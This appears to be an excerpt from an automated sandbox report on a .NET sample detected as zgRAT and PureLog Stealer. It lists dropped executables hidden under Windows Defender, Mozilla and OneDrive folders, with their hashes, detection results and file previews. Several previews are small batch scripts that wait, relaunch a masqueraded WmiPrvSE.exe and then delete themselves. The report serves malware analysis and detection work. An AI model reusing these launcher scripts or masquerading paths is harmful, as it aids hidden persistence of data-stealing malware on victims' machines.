SSDEEP:	12:hGpMyhAg0RRj1HhbJ2kN19NvgtZUy1B1LCUGAv/4zMzuLnMH6lxrUsZ:hyMybeBz2i1T2D1LCUczdLnKKx4u
MD5:	07B89347FAA3BFBF2E3A831048701B5A
SHA1:	738DD4D30161F14DF3C25882BABEC7A3E0FC30C1
SHA-256:	FCB95ECBBD448CF75D38EE6EF2AAADE0F07C903138B7D30644C1E10E2420D33D
SHA-512:	42E94EABDFB4D2E6C6C0BAE9AC336D6338FAE76859FE53CB563654A129AF581BA79FDB7163C79AFF60285D6D18CAEEC27043483049EC8A458A83C3349966A21F
Malicious:	false
Preview:	164psE9COXAB9JZOFyJOYx5QcBYYJkEuWkuuq3vYG8lCfV7E7EHZCNMDAoMqpk2oTQpZYpiLDuIZM3uHEUbFdprJXruBqEsfG7tOqhpSg5VRFw1H4FmUJxLnigBr4ge8CmTOJfbgoJihTaDlzmHlbYVSwGqJg8X9aXPccn8YoFqAOnUIca1RZ3gnQAbDzRAqviG6KlIMot7WrVDJwhrGHFkh0lLbL4iXFAOqhX71Ronq6K657SRSj3iq8iGjZqBtKkQrGXmYj0ycc3lppQe3nQxLbis8RYbln3fV4Oyjq2stFGNE7a3ILHG4wEQipnHLZNzjXPvbc5NuhEGUVnB0eSZfxlj07Q4CvhT1RoqrpcqQ4VWs76MBmQqGxTvwq5dMBK9AuODq6TLCmJlcO12BD2Zf0NE724Au8ePtVW7s2gFSEndosThzCcIIvdJgKGxBTbEI42G23JJgxHaNtaPjXLrfVG82MaiwsD9njVt0No53TmVoC6wu0OnHtiwx3OqckWytHxnYqZVtPyMtvUzPoy5eZ14Ai6697dS6xmgPSYDb2425WDCjYaywbTTP3nzudWvwgP5Ixj7Pvelf98of3Wkg

C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3408384
Entropy (8bit):	7.803162366843507
Encrypted:	false
SSDEEP:	49152:dvE7aj/zSltwCUFFINtKAh/tIBs2htYmMoxqSeU843FULbiGLSkGHuIB6MlwALMV:9FzPFFIv7h/KVWYxVeE+i1FOIB6Mmkw
MD5:	0AD0B4A4A549230E090D712B5521BD96
SHA1:	55690E0D976955E80F14C314EFCAA34E3303A02B
SHA-256:	9882EE185D8D4DB2A86040B7E3C7687CEF737470F2A7B5C88868E80880CBD429
SHA-512:	B689AB2B7E3A59F760D3C6CB3B72927E3DC0EB9323ACEB05C2571CA85863FC769098924B943E6E80EDB1853C348451869996FD4C38A7DD10DC8E2970E5D4D027
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J..g..................3.........N.4.. ... 4...@.. .......................`4...........@...................................4.K.... 4. ....................@4...................................................... ............... ..H............text...T.3.. ....3................. ..`.rsrc... .... 4.......3.............@....reloc.......@4.......4.............@..B................0.4.....H...........X...........<...+;).\|.4......................................0..........(.... ........8........E........q...M...)...8....(.... ....~....{....:....& ....8....(.... ....~....{}...:....& ....8....(.... ....~....{....:....& ....8z......0.......... ........8........E........%...[...............8....r...ps....z~....9d... ....8....~....(7... .... .... ....s....~....(;....... ....8....8.... ....~....{....:o...& ....8d......... ....~....{....9J...& ....8?.......~....(?..

C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Windows Defender\en-GB\6661cc8d955995

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with very long lines (314), with no line terminators
Category:	dropped
Size (bytes):	314
Entropy (8bit):	5.82156098756488
Encrypted:	false
SSDEEP:	6:ZcPbFcdcsP6vzWUyWLVQxQWzeWWo3T3Uit+tY9RBbsux09Is09olw5aBwBXT2Fw9:ODSP6vzWUz+eWWo3T3dtDDlsux09Awwx
MD5:	B7F165F64E7893330BA8F92CFD0D965F
SHA1:	06FF5AF2111AB39F3E2329173CFD076188D89167
SHA-256:	08DC42D0E58EA358E3D8A9C3C2E7098FBA0ABE2948018CC046B15A11E9580D8A
SHA-512:	96958E40817926B36BBDB88A6DA95224E42A37EC0AA929458F7320F6BBB7A234F8FD33B8006E3EC388C79E55183CAE7BF66EA7A6B7FF887CC0DA8DE27ED784EB
Malicious:	false
Preview:	7fIGZGI4wzdjB6sxQ49U0GwOHAubzgNSpbgFW2jhW9kvDFeivfAbpPc1t39ZWrEPlL3jamaXUb71gALBfLpUgvma9pWd3KLp5VJ2M5IJEmHOSkUss83KBuszjcjuQ7eJQR6L0TykDfP4oXIZUnv5RAnKmUSuVX3GI77AoJ1YKTGgeyLLTKanMi2PnvigADOqmIwqaIvKvWv74HqyJHaL6Q4jFrW2lVYGFZ3VCeuLYP10x4VfFtX2mCtWOMlsv2jZ7o2eOUwoWPwrYEvKV1x17fdCqgHz2Cagpb2JC1Ru7sfXQC8KbbW4FscbK0

C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3408384
Entropy (8bit):	7.803162366843507
Encrypted:	false
SSDEEP:	49152:dvE7aj/zSltwCUFFINtKAh/tIBs2htYmMoxqSeU843FULbiGLSkGHuIB6MlwALMV:9FzPFFIv7h/KVWYxVeE+i1FOIB6Mmkw
MD5:	0AD0B4A4A549230E090D712B5521BD96
SHA1:	55690E0D976955E80F14C314EFCAA34E3303A02B
SHA-256:	9882EE185D8D4DB2A86040B7E3C7687CEF737470F2A7B5C88868E80880CBD429
SHA-512:	B689AB2B7E3A59F760D3C6CB3B72927E3DC0EB9323ACEB05C2571CA85863FC769098924B943E6E80EDB1853C348451869996FD4C38A7DD10DC8E2970E5D4D027
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J..g..................3.........N.4.. ... 4...@.. .......................`4...........@...................................4.K.... 4. ....................@4...................................................... ............... ..H............text...T.3.. ....3................. ..`.rsrc... .... 4.......3.............@....reloc.......@4.......4.............@..B................0.4.....H...........X...........<...+;).\|.4......................................0..........(.... ........8........E........q...M...)...8....(.... ....~....{....:....& ....8....(.... ....~....{}...:....& ....8....(.... ....~....{....:....& ....8z......0.......... ........8........E........%...[...............8....r...ps....z~....9d... ....8....~....(7... .... .... ....s....~....(;....... ....8....8.... ....~....{....:o...& ....8d......... ....~....{....9J...& ....8?.......~....(?..

C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Media Player\en-GB\6661cc8d955995

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with very long lines (851), with no line terminators
Category:	dropped
Size (bytes):	851
Entropy (8bit):	5.88735788396667
Encrypted:	false
SSDEEP:	12:H7ssTfemlrm6C581lJX15OTOLiewqYP39YFR6u0JhgQ0yqkvqNQ0vtQrSp:HvJC6C56JX1OOLieh30fg0kDvxp
MD5:	B7AD08CB7B72776721CA8CDD72B73288
SHA1:	3DF90956952CB30812201AC974AD617A6E778C85
SHA-256:	54AC572F0C9D1CC7B687B5EE652C6C12235E40579859A96F8DAAC51E8996C518
SHA-512:	D01FCA811D9D2C32F241FB0F3E3EFCA04F28AF79CEE9F18434DFD03A6553FB30711AFE9390B3EEE8E266CC046089C1328F83B5A7CBBDAB28B82E0EE3BB9A896C
Malicious:	false
Preview:	phSivRr3nPIwkL2prOR4pH0RBKC1ZzajrLHx77Bno7SirN670XHaxXKiqBhkPzeyziEYDFrtNnQszSjxOEABr9wUAjG6aaYyddtJIh4vqYNJHctYbtWKycGzvuYe9uTxObOVjaoqKPVTwmMh0reqDOAAW3XYJav5Ea5pNXzBEp9iHxDIi0oRPmt9bN8pDQhueZOWrhUc2dmYOb3i0OzSwdpcq5N9ZK8yHPErjrbAgLZwAUv9UZyyaO7AtwpwTUDsfxQ8XM9JxzwkE3bWKOp9VJX2RE8xBoqLIrQMEwmHapBlcX5zUTmFoEWVaXrSOMHIIkbXnORXlhiqIva4IIcsClgEU4vqFT3Oh2d15iMFBOeHfqNp6wJFtYGhDXCsckSSnUIQSi9k5WrxGZjnrGtSJxeIv5xifena5LdLh6WYxjKXrTanyZBW0AIzzAfWuaFbtQ146XGuuVfknHbcfJuFcQk5DnVhb9nWdtnabfraTRleeiMsiC1lq98cq51TCiSusIG4dAB9cTwLpFafan8ZICpeuLufoYYu81wWbROiB1IXMwxlfW2Yj3lqcmKSQfVE5BNxTEDJYaXR3SR7XJARg9KFPF3yH6SffEbKj9RaSt9JfUwJVM4GfDi61HhNKPBcH1vz1GXX1j9w9Aj5Ttd5CLAbffTccEPDshCoi7SPzgP5Ev60im4awFa51TTVw55wT6Ec85WVaNGf6EXujd30KyRmGGxPn7c3kclIqd1nPiAi949w6jwTBFmfpcW2IHsdvM4edPDFlQkmysmLHASEKJ1f0GcNH9eI0gxxAfTrfqrveAq60KvHznSlVZnWwz8mvcwS5yLlrliecGA0agX

C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3408384
Entropy (8bit):	7.803162366843507
Encrypted:	false
SSDEEP:	49152:dvE7aj/zSltwCUFFINtKAh/tIBs2htYmMoxqSeU843FULbiGLSkGHuIB6MlwALMV:9FzPFFIv7h/KVWYxVeE+i1FOIB6Mmkw
MD5:	0AD0B4A4A549230E090D712B5521BD96
SHA1:	55690E0D976955E80F14C314EFCAA34E3303A02B
SHA-256:	9882EE185D8D4DB2A86040B7E3C7687CEF737470F2A7B5C88868E80880CBD429
SHA-512:	B689AB2B7E3A59F760D3C6CB3B72927E3DC0EB9323ACEB05C2571CA85863FC769098924B943E6E80EDB1853C348451869996FD4C38A7DD10DC8E2970E5D4D027
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J..g..................3.........N.4.. ... 4...@.. .......................`4...........@...................................4.K.... 4. ....................@4...................................................... ............... ..H............text...T.3.. ....3................. ..`.rsrc... .... 4.......3.............@....reloc.......@4.......4.............@..B................0.4.....H...........X...........<...+;).\|.4......................................0..........(.... ........8........E........q...M...)...8....(.... ....~....{....:....& ....8....(.... ....~....{}...:....& ....8....(.... ....~....{....:....& ....8z......0.......... ........8........E........%...[...............8....r...ps....z~....9d... ....8....~....(7... .... .... ....s....~....(;....... ....8....8.... ....~....{....:o...& ....8d......... ....~....{....9J...& ....8?.......~....(?..

C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\OneDrive\6661cc8d955995

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with very long lines (633), with no line terminators
Category:	dropped
Size (bytes):	633
Entropy (8bit):	5.8783745563796295
Encrypted:	false
SSDEEP:	12:0QdPaa9x0gQRMiCHNnot14/DIISakcQSYxrSl:XQRMiQVk14/FNDYq
MD5:	1C8D4FFB2B0436E6B84871CAED5AA5A4
SHA1:	ACE3899041C2EC1BF7D5A1D97C4783125DC0769F
SHA-256:	C48E417DB3AE16E989A27D40BFD937437AC8935CEA35C60CACA6C42AF2F2F373
SHA-512:	98CA7137680CF2B4F9E069282ACAA4E00D67635AD4A9F65561DA1DE47CC3BC4DF633F71C8CD3BFA1DFD635330CED4C70B3ACA0CAD1974990C63294A0228A4B24
Malicious:	false
Preview:	ws90HnrHEogS7cZCszxC4JQ7LJXEem0sywQiFKuRXtcS6QV5fn7Yw3snbBp8QmmcyyeLL17hFgpLr8B5xcj1ob54EnGDfwAuG9dIwKtnqaTQOg5dAtKyDvyX3jGiu3CSf4Fre2Jms5LOIoqhrmDvlMqULGPMEL3wYAuTbO9HkiGIkjOO3i0H0QrTNugXn6igCY0H4WGdn5LDGitl1ATfUv6HTbFqrmdn9jFLtHUhbXe4EnNpB4fnnCMQcsxcQavAbhDgdh2uqwD6QBCpNapxG0A7XytBT1QBmddhkqLdCv608PAbpIPzv73kgGJoy0azfCUwifFhOLuV4J8HyRVLmbPok2AdghoLUHV65N3KDrkjMiqXIC0gfPNDxpMpflBrhjBxyBMlYKH41pbBLnVerHpE4RIPANpcq2Bnh3jGzOHUHSMHNKe2PgAa363g36kLfpO8nyeSDPoc9V7lEBCztxMJ2lukACN3n6zcEOdZpLyA2hai9Rb14vcscEFCD4SBBvyDgegzimJh9MQVLLlskV82dG99JbVv3w8HsXCeumTSl4tQxt01Sjaqw5jZfgqGQYoMNJmyJH78BqRiXsMZkdcTVSVwxm8N5MBMQgCoHCsLlcoFoACxUQfw5

C:\Users\Default\OneDrive\qLBhpsNtheWbwIdhOeZ.exe

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3408384
Entropy (8bit):	7.803162366843507
Encrypted:	false
SSDEEP:	49152:dvE7aj/zSltwCUFFINtKAh/tIBs2htYmMoxqSeU843FULbiGLSkGHuIB6MlwALMV:9FzPFFIv7h/KVWYxVeE+i1FOIB6Mmkw
MD5:	0AD0B4A4A549230E090D712B5521BD96
SHA1:	55690E0D976955E80F14C314EFCAA34E3303A02B
SHA-256:	9882EE185D8D4DB2A86040B7E3C7687CEF737470F2A7B5C88868E80880CBD429
SHA-512:	B689AB2B7E3A59F760D3C6CB3B72927E3DC0EB9323ACEB05C2571CA85863FC769098924B943E6E80EDB1853C348451869996FD4C38A7DD10DC8E2970E5D4D027
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J..g..................3.........N.4.. ... 4...@.. .......................`4...........@...................................4.K.... 4. ....................@4...................................................... ............... ..H............text...T.3.. ....3................. ..`.rsrc... .... 4.......3.............@....reloc.......@4.......4.............@..B................0.4.....H...........X...........<...+;).\|.4......................................0..........(.... ........8........E........q...M...)...8....(.... ....~....{....:....& ....8....(.... ....~....{}...:....& ....8....(.... ....~....{....:....& ....8z......0.......... ........8........E........%...[...............8....r...ps....z~....9d... ....8....~....(7... .... .... ....s....~....(;....... ....8....8.... ....~....{....:o...& ....8d......... ....~....{....9J...& ....8?.......~....(?..

C:\Users\Default\OneDrive\qLBhpsNtheWbwIdhOeZ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9D7RwuJrth.exe.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1698
Entropy (8bit):	5.367720686892084
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
MD5:	2C0A3C5388C3FAAFA50C8FB701A28891
SHA1:	D75655E5C231DE60C96FD196658C429E155BEB0F
SHA-256:	A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
SHA-512:	0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
MD5:	73E7DD0D3AE6532ADBC6411F439B5DE3
SHA1:	427BE8DB5338D856906C1DDFBD186319A02F7567
SHA-256:	A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
SHA-512:	33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Temp\31uZT8RR1g

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.5638561897747225
Encrypted:	false
SSDEEP:	3:BfiBe9Kjql:Ba0n
MD5:	E5A3C30F7126DA667BECB1CDF6C50F6F
SHA1:	B923078A406AA8A14D530AE1F312008D94A0F662
SHA-256:	1F787DA0FF8912E360D521FFC28BEBB3256B13C6966DEB648B54E222DA8A9D09
SHA-512:	B2786F7B0FA2E6FC9C60883E1DB81B64301EF527BBC1E75893768D47532290F53EF8FDBF4A11813E63807A132DA58756BB3901BABF355AA2631AD73DE6E6DC22
Malicious:	false
Preview:	5K1qoaGdryzk7JMZGUSQ39OVl

C:\Users\user\AppData\Local\Temp\80hMChn298

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:MnGDaAj:TDaAj
MD5:	3932C3ECF793CF6E1A7747907D45EBA0
SHA1:	FCB63C3CF264CD10C93ABD79222ABED6C9C187FC
SHA-256:	CDC95EA1225782F451ACF827ADF7B84CFA0C67D21172BB9F3FF5878337D3F54F
SHA-512:	B184E6F1CE6BCFF48C534858F39E7EDCE68E7828BC97C0CDBCCA1EFE2C4D7D3A7AFA479D464D998143BDFD8C3E439A9E0465BA9EBB4666FE3458CC893A35C28B
Malicious:	false
Preview:	PfMQbdasrWBeFMD7qf8K3A4XF

C:\Users\user\AppData\Local\Temp\9O9rrJCHDg.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.242438865154323
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVPAnEXwXl8buIdASBktKcKZG1t+kiE2J5xAIuXCIq:hCRLuVFOOr+DEdHXi0KOZG1wkn23fsqn
MD5:	31DD773B313CC2DDC0E86CE35CE34F5F
SHA1:	45314A24936A43FE45F6A5687C50E6486931E678
SHA-256:	05932828523D9BBCDFB17B0713B6242EE6E3181CD34696D5D25CBB7CCCFD42CC
SHA-512:	AFDC88CB26EFD1B446099AF4D2DB9BF4DC86FD7280607AFFAD66E0637F74BCE95C8D1DA8F45FDAE6BC7A0D7E7797016C8D894239CAB85C2E90AE23D157C03218
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\9O9rrJCHDg.bat"

C:\Users\user\AppData\Local\Temp\BBca1gliPd.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.13096976893157
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEdHXi0KOZG1wkn23fVvC1o:HTg9uYDENX1fwo
MD5:	DFC6DD978C09B7A22D4A2019F2A110D6
SHA1:	F417D0BD4FB13709CD8819150AEAAF593359C458
SHA-256:	FB9FAA22F9EF8B4431A46E553D6C8197CD6EEDE5BC905D9F468C98544BDE9FCD
SHA-512:	4A5AFB149D5758E9C719CEE9D5B6F63726A7BB6EC9B06688693BC2AFCD09ADF845852911C66775947584A8E97CCFFCFE795C543DC53BECC2D297BA4138CA7C95
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\BBca1gliPd.bat"

C:\Users\user\AppData\Local\Temp\BLXo76X4ph.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.231681440226101
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVPAnEXwXl8buIdASBktKcKZG1t+kiE2J5xAIb9JTK:hCRLuVFOOr+DEdHXi0KOZG1wkn23fbrK
MD5:	56A77D438A347E6B1B3D569C11D936CC
SHA1:	DDCC15BF5B2D8AA3F65520F11A3EBEAADEB32FF7
SHA-256:	CC725ED9FA93A5ED620026F88D4B0F859E67593F5160C1E92A97A33E3D0EA60B
SHA-512:	81E50170A347B20506A95F6AF30FEB409178B46D043A9FC0D5AF7D95F369EF7391453CE8B32960A82E17A3A2D5AB16466BF33EA0D5BF90E6A6371C91A1D1274A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\BLXo76X4ph.bat"

C:\Users\user\AppData\Local\Temp\FYUTXnTyLD.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.258254651908666
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVPAnEXwXl8buIdASBktKcKZG1t+kiE2J5xAISEfYI:hCRLuVFOOr+DEdHXi0KOZG1wkn23ftfj
MD5:	653E2B6E5123135559F4821C185BD6C4
SHA1:	1D704E5AEE447C97557BC9AE5BDE239C1E49DE71
SHA-256:	73E8F17660E4FEE67421B4F672EB19C25FA639FD97382B999E5D047C77A2BFE6
SHA-512:	C7E3A30E85B41F8B4532E53948FBD836A4EBE81C59B8B60020D90E4D160C9B2A6AED279927AB63E3CA8B11D573506514368B41AAB92D5320E28ACE77FA9E4544
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\FYUTXnTyLD.bat"

C:\Users\user\AppData\Local\Temp\KvMN3vAFGm.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.204264095573942
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEdHXi0KOZG1wkn23fN2n:HTg9uYDENX1fF2n
MD5:	816B4AB687C2C725DE449C562478E3DC
SHA1:	311F134EF233325C5A873E286474194F7219CA09
SHA-256:	8E403C2F6D15CC3B32B53234BED2AC9D0F40969EE0768223C1B8A1D9EEB27757
